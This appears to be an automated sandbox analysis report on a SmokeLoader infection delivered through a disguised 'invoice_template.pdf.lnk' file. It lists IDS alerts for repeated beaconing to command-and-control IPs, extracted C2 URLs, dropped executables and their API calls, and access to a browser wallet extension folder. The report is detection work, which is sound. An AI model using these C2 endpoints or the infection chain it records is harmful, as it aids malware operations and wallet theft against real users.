        2024-11-06T17:40:05.057944+010020391031A Network Trojan was detected192.168.11.2050294150.241.91.21880TCP
        2024-11-06T17:40:06.523102+010020391031A Network Trojan was detected192.168.11.2050295150.241.91.21880TCP
        2024-11-06T17:40:07.004800+010020391031A Network Trojan was detected192.168.11.2050296150.241.91.21880TCP
        2024-11-06T17:40:09.484557+010020391031A Network Trojan was detected192.168.11.2050297150.241.91.21880TCP
        2024-11-06T17:40:09.942745+010020391031A Network Trojan was detected192.168.11.2050298150.241.91.21880TCP
        2024-11-06T17:40:10.399893+010020391031A Network Trojan was detected192.168.11.2050299150.241.91.21880TCP
        2024-11-06T17:40:10.859156+010020391031A Network Trojan was detected192.168.11.2050300150.241.91.21880TCP
        2024-11-06T17:40:11.319056+010020391031A Network Trojan was detected192.168.11.2050301150.241.91.21880TCP
        2024-11-06T17:40:11.776768+010020391031A Network Trojan was detected192.168.11.2050302150.241.91.21880TCP
        2024-11-06T17:40:13.246494+010020391031A Network Trojan was detected192.168.11.2050303150.241.91.21880TCP
        2024-11-06T17:40:13.714170+010020391031A Network Trojan was detected192.168.11.2050304150.241.91.21880TCP
        2024-11-06T17:40:14.177176+010020391031A Network Trojan was detected192.168.11.2050305150.241.91.21880TCP
        2024-11-06T17:40:14.634829+010020391031A Network Trojan was detected192.168.11.2050306150.241.91.21880TCP
        2024-11-06T17:40:15.098850+010020391031A Network Trojan was detected192.168.11.2050307150.241.91.21880TCP
        2024-11-06T17:40:15.556908+010020391031A Network Trojan was detected192.168.11.2050308150.241.91.21880TCP
        2024-11-06T17:40:17.020608+010020391031A Network Trojan was detected192.168.11.2050309150.241.91.21880TCP
        2024-11-06T17:40:17.481626+010020391031A Network Trojan was detected192.168.11.2050310150.241.91.21880TCP
        2024-11-06T17:40:17.944014+010020391031A Network Trojan was detected192.168.11.2050311150.241.91.21880TCP
        2024-11-06T17:40:18.402747+010020391031A Network Trojan was detected192.168.11.2050312150.241.91.21880TCP
        2024-11-06T17:40:18.879483+010020391031A Network Trojan was detected192.168.11.2050313150.241.91.21880TCP
        2024-11-06T17:40:19.340908+010020391031A Network Trojan was detected192.168.11.2050314150.241.91.21880TCP
        2024-11-06T17:40:19.800585+010020391031A Network Trojan was detected192.168.11.2050315150.241.91.21880TCP
        2024-11-06T17:40:20.258578+010020391031A Network Trojan was detected192.168.11.2050316150.241.91.21880TCP
        2024-11-06T17:40:20.715671+010020391031A Network Trojan was detected192.168.11.2050317150.241.91.21880TCP
        2024-11-06T17:40:21.176184+010020391031A Network Trojan was detected192.168.11.2050318150.241.91.21880TCP
        2024-11-06T17:40:21.636507+010020391031A Network Trojan was detected192.168.11.2050319150.241.91.21880TCP
        2024-11-06T17:40:22.094958+010020391031A Network Trojan was detected192.168.11.2050320150.241.91.21880TCP
        2024-11-06T17:40:22.559728+010020391031A Network Trojan was detected192.168.11.2050321150.241.91.21880TCP
        2024-11-06T17:40:23.018150+010020391031A Network Trojan was detected192.168.11.2050322150.241.91.21880TCP
        2024-11-06T17:40:23.473839+010020391031A Network Trojan was detected192.168.11.2050323150.241.91.21880TCP
        2024-11-06T17:40:23.930499+010020391031A Network Trojan was detected192.168.11.2050324150.241.91.21880TCP
        2024-11-06T17:40:24.387748+010020391031A Network Trojan was detected192.168.11.2050325150.241.91.21880TCP
        2024-11-06T17:40:24.844107+010020391031A Network Trojan was detected192.168.11.2050326150.241.91.21880TCP
        2024-11-06T17:40:25.306667+010020391031A Network Trojan was detected192.168.11.2050327150.241.91.21880TCP
        2024-11-06T17:40:25.773403+010020391031A Network Trojan was detected192.168.11.2050328150.241.91.21880TCP
        2024-11-06T17:40:26.235636+010020391031A Network Trojan was detected192.168.11.2050329150.241.91.21880TCP
        2024-11-06T17:40:26.697496+010020391031A Network Trojan was detected192.168.11.2050330150.241.91.21880TCP
        2024-11-06T17:40:27.156465+010020391031A Network Trojan was detected192.168.11.2050331150.241.91.21880TCP
        2024-11-06T17:40:27.634109+010020391031A Network Trojan was detected192.168.11.2050332150.241.91.21880TCP
        2024-11-06T17:40:28.104334+010020391031A Network Trojan was detected192.168.11.2050333150.241.91.21880TCP
        2024-11-06T17:40:28.581421+010020391031A Network Trojan was detected192.168.11.2050334150.241.91.21880TCP
        2024-11-06T17:40:30.041666+010020391031A Network Trojan was detected192.168.11.2050335150.241.91.21880TCP
        2024-11-06T17:40:30.501968+010020391031A Network Trojan was detected192.168.11.2050336150.241.91.21880TCP
        2024-11-06T17:40:30.978930+010020391031A Network Trojan was detected192.168.11.2050337150.241.91.21880TCP
        2024-11-06T17:40:31.441078+010020391031A Network Trojan was detected192.168.11.2050338150.241.91.21880TCP
        2024-11-06T17:40:31.896578+010020391031A Network Trojan was detected192.168.11.2050339150.241.91.21880TCP
        2024-11-06T17:40:32.361939+010020391031A Network Trojan was detected192.168.11.2050340150.241.91.21880TCP
        2024-11-06T17:40:32.820994+010020391031A Network Trojan was detected192.168.11.2050341150.241.91.21880TCP
        2024-11-06T17:40:33.296801+010020391031A Network Trojan was detected192.168.11.2050342150.241.91.21880TCP
        2024-11-06T17:40:33.763257+010020391031A Network Trojan was detected192.168.11.2050343150.241.91.21880TCP
        2024-11-06T17:40:34.250200+010020391031A Network Trojan was detected192.168.11.2050344150.241.91.21880TCP
        2024-11-06T17:40:34.734576+010020391031A Network Trojan was detected192.168.11.2050345150.241.91.21880TCP
        2024-11-06T17:40:36.225546+010020391031A Network Trojan was detected192.168.11.2050346150.241.91.21880TCP
        2024-11-06T17:40:36.698778+010020391031A Network Trojan was detected192.168.11.2050347150.241.91.21880TCP
        2024-11-06T17:40:37.158063+010020391031A Network Trojan was detected192.168.11.2050348150.241.91.21880TCP
        2024-11-06T17:40:37.619309+010020391031A Network Trojan was detected192.168.11.2050349150.241.91.21880TCP
        2024-11-06T17:40:38.077822+010020391031A Network Trojan was detected192.168.11.2050350150.241.91.21880TCP
        2024-11-06T17:40:38.534588+010020391031A Network Trojan was detected192.168.11.2050351150.241.91.21880TCP
        2024-11-06T17:40:38.995289+010020391031A Network Trojan was detected192.168.11.2050352150.241.91.21880TCP
        2024-11-06T17:40:39.457089+010020391031A Network Trojan was detected192.168.11.2050353150.241.91.21880TCP
        2024-11-06T17:40:39.923186+010020391031A Network Trojan was detected192.168.11.2050354150.241.91.21880TCP
        2024-11-06T17:40:40.388592+010020391031A Network Trojan was detected192.168.11.2050355150.241.91.21880TCP
        2024-11-06T17:40:41.852784+010020391031A Network Trojan was detected192.168.11.2050356150.241.91.21880TCP
        2024-11-06T17:40:42.325801+010020391031A Network Trojan was detected192.168.11.2050357150.241.91.21880TCP
        2024-11-06T17:40:42.789586+010020391031A Network Trojan was detected192.168.11.2050358150.241.91.21880TCP
        2024-11-06T17:40:43.254906+010020391031A Network Trojan was detected192.168.11.2050359150.241.91.21880TCP
        2024-11-06T17:40:43.718250+010020391031A Network Trojan was detected192.168.11.2050360150.241.91.21880TCP
        2024-11-06T17:40:44.180754+010020391031A Network Trojan was detected192.168.11.2050361150.241.91.21880TCP
        2024-11-06T17:40:44.645236+010020391031A Network Trojan was detected192.168.11.2050362150.241.91.21880TCP
        2024-11-06T17:40:45.113017+010020391031A Network Trojan was detected192.168.11.2050363150.241.91.21880TCP
        2024-11-06T17:40:45.572747+010020391031A Network Trojan was detected192.168.11.2050364150.241.91.21880TCP
        2024-11-06T17:40:46.023117+010020391031A Network Trojan was detected192.168.11.2050365150.241.91.21880TCP
        2024-11-06T17:40:46.490245+010020391031A Network Trojan was detected192.168.11.2050366150.241.91.21880TCP
        2024-11-06T17:40:46.948092+010020391031A Network Trojan was detected192.168.11.2050367150.241.91.21880TCP
        2024-11-06T17:40:47.411091+010020391031A Network Trojan was detected192.168.11.2050368150.241.91.21880TCP
        2024-11-06T17:40:47.874198+010020391031A Network Trojan was detected192.168.11.2050369150.241.91.21880TCP
        2024-11-06T17:40:48.338079+010020391031A Network Trojan was detected192.168.11.2050370150.241.91.21880TCP
        2024-11-06T17:40:48.816864+010020391031A Network Trojan was detected192.168.11.2050371150.241.91.21880TCP
        2024-11-06T17:40:49.293844+010020391031A Network Trojan was detected192.168.11.2050372150.241.91.21880TCP
        2024-11-06T17:40:49.753958+010020391031A Network Trojan was detected192.168.11.2050373150.241.91.21880TCP
        2024-11-06T17:40:50.984541+010020391031A Network Trojan was detected192.168.11.2050374150.241.91.21880TCP
        2024-11-06T17:40:51.460117+010020391031A Network Trojan was detected192.168.11.2050375150.241.91.21880TCP
        2024-11-06T17:40:51.924844+010020391031A Network Trojan was detected192.168.11.2050376150.241.91.21880TCP
        2024-11-06T17:40:52.385225+010020391031A Network Trojan was detected192.168.11.2050377150.241.91.21880TCP
        2024-11-06T17:40:52.856217+010020391031A Network Trojan was detected192.168.11.2050378150.241.91.21880TCP
        2024-11-06T17:40:53.315785+010020391031A Network Trojan was detected192.168.11.2050379150.241.91.21880TCP
        2024-11-06T17:40:53.780937+010020391031A Network Trojan was detected192.168.11.2050380150.241.91.21880TCP
        2024-11-06T17:40:55.251482+010020391031A Network Trojan was detected192.168.11.2050381150.241.91.21880TCP
        2024-11-06T17:40:55.705169+010020391031A Network Trojan was detected192.168.11.2050382150.241.91.21880TCP
        2024-11-06T17:40:56.174827+010020391031A Network Trojan was detected192.168.11.2050383150.241.91.21880TCP
        2024-11-06T17:40:56.633367+010020391031A Network Trojan was detected192.168.11.2050384150.241.91.21880TCP
        2024-11-06T17:40:57.196776+010020391031A Network Trojan was detected192.168.11.2050385150.241.91.21880TCP
        2024-11-06T17:40:57.658810+010020391031A Network Trojan was detected192.168.11.2050386150.241.91.21880TCP
        2024-11-06T17:40:58.119897+010020391031A Network Trojan was detected192.168.11.2050387150.241.91.21880TCP
        2024-11-06T17:40:58.578987+010020391031A Network Trojan was detected192.168.11.2050388150.241.91.21880TCP
        2024-11-06T17:40:59.340162+010020391031A Network Trojan was detected192.168.11.2050389150.241.91.21880TCP
        2024-11-06T17:40:59.804370+010020391031A Network Trojan was detected192.168.11.2050390150.241.91.21880TCP
        2024-11-06T17:41:00.274571+010020391031A Network Trojan was detected192.168.11.2050391150.241.91.21880TCP
        2024-11-06T17:41:00.731668+010020391031A Network Trojan was detected192.168.11.2050392150.241.91.21880TCP
        2024-11-06T17:41:02.210814+010020391031A Network Trojan was detected192.168.11.2050393150.241.91.21880TCP
        2024-11-06T17:41:02.671245+010020391031A Network Trojan was detected192.168.11.2050394150.241.91.21880TCP
        2024-11-06T17:41:03.130205+010020391031A Network Trojan was detected192.168.11.2050395150.241.91.21880TCP
        2024-11-06T17:41:03.590472+010020391031A Network Trojan was detected192.168.11.2050396150.241.91.21880TCP
        2024-11-06T17:41:04.046623+010020391031A Network Trojan was detected192.168.11.2050397150.241.91.21880TCP
        2024-11-06T17:41:04.507837+010020391031A Network Trojan was detected192.168.11.2050398150.241.91.21880TCP
        2024-11-06T17:41:04.964287+010020391031A Network Trojan was detected192.168.11.2050399150.241.91.21880TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-11-06T17:34:03.876713+010028298482Potentially Bad Traffic150.241.91.21880192.168.11.2049754TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 0000000F.00000002.20019876866.0000000002950000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://quantumqube.org/index.php", "https://quantumqube.org/index.php", "http://innovixus.org/index.php", "https://innovixus.org/index.php"]}
        Source: invoice_template.pdf.lnkReversingLabs: Detection: 13%
        Source: invoice_template.pdf.lnkJoe Sandbox ML: detected
        Source: Binary string: WalletProxy.pdbGCTL source: explorer.exe, 00000019.00000003.20363166776.0000000004E21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20362445518.0000000004D74000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20330653340.0000000004D98000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20368586190.0000000004D65000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20368948162.0000000004E21000.00000004.00000020.00020000.00000000.sdmp, WalletProxy.dll.25.dr, WalletProxy.dll0.25.dr, WalletProxy.dll1.25.dr, WalletProxy.dll2.25.dr
        Source: Binary string: walletservice.pdbGCTL source: explorer.exe, 00000019.00000003.20366731126.0000000004D65000.00000004.00000020.00020000.00000000.sdmp, WalletService.dll1.25.dr
        Source: Binary string: WalletProxy.pdb source: explorer.exe, 00000019.00000003.20363166776.0000000004E21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20362445518.0000000004D74000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20330653340.0000000004D98000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20368586190.0000000004D65000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20368948162.0000000004E21000.00000004.00000020.00020000.00000000.sdmp, WalletProxy.dll.25.dr, WalletProxy.dll0.25.dr, WalletProxy.dll1.25.dr, WalletProxy.dll2.25.dr
        Source: Binary string: xy.pdb source: explorer.exe, 00000019.00000003.20364678386.0000000004D70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20368586190.0000000004D65000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: Windows.ApplicationModel.Wallet.pdb source: explorer.exe, 00000019.00000003.20331750475.0000000004E32000.00000004.00000020.00020000.00000000.sdmp, Windows.ApplicationModel.Wallet.dll2.25.dr, Windows.ApplicationModel.Wallet.dll1.25.dr, Windows.ApplicationModel.Wallet.dll3.25.dr, Windows.ApplicationModel.Wallet.dll6.25.dr
        Source: Binary string: WalletBackgroundServiceProxy.pdb source: explorer.exe, 00000019.00000003.20361114473.0000000004D74000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20367635324.0000000004E21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20361114473.0000000004D70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20367070090.0000000004D74000.00000004.00000020.00020000.00000000.sdmp, WalletBackgroundServiceProxy.dll.25.dr, WalletBackgroundServiceProxy.dll2.25.dr, WalletBackgroundServiceProxy.dll0.25.dr, WalletBackgroundServiceProxy.dll1.25.dr
        Source: Binary string: WalletBackgroundServiceProxy.pdbGCTL source: explorer.exe, 00000019.00000003.20361114473.0000000004D74000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20367635324.0000000004E21000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000003.20367070090.0000000004D74000.00000004.00000020.00020000.00000000.sdmp, WalletBackgroundServiceProxy.dll.25.dr, WalletBackgroundServiceProxy.dll2.25.dr, WalletBackgroundServiceProxy.dll0.25.dr, WalletBackgroundServiceProxy.dll1.25.dr
        Source: Binary string: xy.pdbGCT.r source: explorer.exe, 00000019.00000003.20364678386.0000000004D70000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: walletservice.pdb source: explorer.exe, 00000019.00000003.20366731126.0000000004D65000.00000004.00000020.00020000.00000000.sdmp, WalletService.dll1.25.dr
        Source: Binary string: xy.pdbGCT.orp source: explorer.exe, 00000019.00000003.20368586190.0000000004D65000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: Windows.ApplicationModel.Wallet.pdbGCTL source: explorer.exe, 00000019.00000003.20331750475.0000000004E32000.00000004.00000020.00020000.00000000.sdmp, Windows.ApplicationModel.Wallet.dll2.25.dr, Windows.ApplicationModel.Wallet.dll1.25.dr, Windows.ApplicationModel.Wallet.dll3.25.dr, Windows.ApplicationModel.Wallet.dll6.25.dr
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeCode function: 3_2_004062D5 FindFirstFileW,FindClose,3_2_004062D5
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeCode function: 3_2_00402E18 FindFirstFileW,3_2_00402E18
        Source: C:\Users\user\AppData\Local\Temp\winpdf.exeCode function: 3_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_00406C9B
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_00314005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00314005
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_0031C2FF FindFirstFileW,FindNextFileW,FindClose,13_2_0031C2FF
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_0031494A GetFileAttributesW,FindFirstFileW,FindClose,13_2_0031494A
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_0031CD14 FindFirstFileW,FindClose,13_2_0031CD14
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_0031CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,13_2_0031CD9F
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_0031F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_0031F5D8
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_0031F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_0031F735
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_0031FA36 FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_0031FA36
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 13_2_00313CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00313CE2
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_00314005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_00314005
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_0031C2FF FindFirstFileW,FindNextFileW,FindClose,15_2_0031C2FF
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_0031494A GetFileAttributesW,FindFirstFileW,FindClose,15_2_0031494A
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_0031CD14 FindFirstFileW,FindClose,15_2_0031CD14
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_0031CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,15_2_0031CD9F
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_0031F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_0031F5D8
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_0031F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_0031F735
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_0031FA36 FindFirstFileW,Sleep,FindNextFileW,FindClose,15_2_0031FA36
        Source: C:\Users\user\AppData\Local\Temp\367647\Productive.pifCode function: 15_2_00313CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_00313CE2
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_00944005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00944005
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0094C2FF FindFirstFileW,FindNextFileW,FindClose,17_2_0094C2FF
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0094494A GetFileAttributesW,FindFirstFileW,FindClose,17_2_0094494A
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0094CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,17_2_0094CD9F
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0094CD14 FindFirstFileW,FindClose,17_2_0094CD14
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0094F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0094F5D8
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0094F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,17_2_0094F735
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_0094FA36 FindFirstFileW,Sleep,FindNextFileW,FindClose,17_2_0094FA36
        Source: C:\Users\user\AppData\Roaming\fejhsitCode function: 17_2_00943CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,17_2_00943CE2
        Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
        Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
        Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
        Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
        Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
        Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49756 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49759 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49788 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49770 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49761 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49774 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49785 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49768 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49778 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49758 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49757 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49762 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49800 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49763 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49754 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49750 -> 85.192.60.190:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49795 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49781 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49779 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49767 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49803 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49823 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49816 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49760 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49773 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49769 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49798 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49786 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49772 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49787 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49764 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49799 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49783 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49845 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49811 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49844 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49766 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49883 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49836 -> 150.241.91.218:80
        Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.11.20:49828 -> 150.241.91.218:80
